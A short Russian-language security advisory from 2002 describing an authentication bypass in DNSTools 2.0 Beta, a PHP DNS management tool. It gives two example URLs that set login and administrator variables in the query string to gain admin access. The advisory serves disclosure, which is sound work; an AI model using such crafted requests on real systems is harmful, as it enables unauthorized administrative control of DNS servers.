Обход идентификации в DNSTools

Дата публикации:
03.05.2002
Всего просмотров:
680
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: DNSTools - Web инструмент, написанный в PHP, используемый для управлением DNS информацией.

Уязвимость позволяет любому удаленному нападающему получать административный доступ. Искусственно созданный URL, может определять переменные, используемые для слежения за идентификацией пользователя и административным доступом.

Уязвимость обнаружена в DNSTools Software DNSTools 2.0 Beta 3-4

Пример:

http://www.example.com/dnstools.php?section=hosts&user_logged_in=true

http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES

Ссылки: dnstools: authentication bypass vulnerability

или введите имя

CAPTCHA